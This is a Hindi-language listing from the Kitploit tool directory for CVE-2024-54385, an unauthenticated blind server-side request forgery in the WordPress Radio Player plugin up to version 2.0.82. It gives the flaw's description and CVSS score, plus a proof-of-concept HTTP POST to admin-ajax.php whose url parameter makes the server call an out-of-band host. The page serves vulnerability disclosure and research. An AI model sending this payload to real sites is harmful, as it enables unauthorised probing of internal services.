Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-54385 — रेडियो प्लेयर <= 2.0.82 - ब्लाइंड अनऑथेंटिकेटेड सर्वर-साइड रिक्वेस्ट फोर्जरी | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-54385
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषण
GitHubrandomrobbiebf/cve-2024-54385

CVE-2024-54385

रेडियो प्लेयर <= 2.0.82 - ब्लाइंड अनऑथेंटिकेटेड सर्वर-साइड रिक्वेस्ट फोर्जरी

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-54385

रेडियो प्लेयर <= 2.0.82 - अनधिकृत सर्वर-साइड रिक्वेस्ट फोर्जरी

विवरण

रेडियो प्लेयर – लाइव शाउटकास्ट, आइसकास्ट और वर्डप्रेस के लिए कोई भी ऑडियो स्ट्रीम प्लेयर नामक वर्डप्रेस प्लगइन 2.0.82 तक (2.0.82 सहित) के सभी संस्करणों में सर्वर-साइड रिक्वेस्ट फोर्जरी के प्रति संवेदनशील है। यह अनधिकृत हमलावरों के लिए वेब एप्लिकेशन से उत्पन्न होने वाले मनमाने स्थानों पर वेब अनुरोध करना संभव बनाता है, जिसका उपयोग आंतरिक सेवाओं से जानकारी क्वेरी करने और संशोधित करने के लिए किया जा सकता है।

विवरण

  • प्रकार: प्लगइन
  • Slug: radio-player
  • प्रभावित संस्करण: 2.0.82
  • CVSS स्कोर: 7.2
  • CVSS रेटिंग: उच्च
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
  • CVE: CVE-2024-54385
  • स्थिति: सक्रिय

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
टूल डाउनलोड करें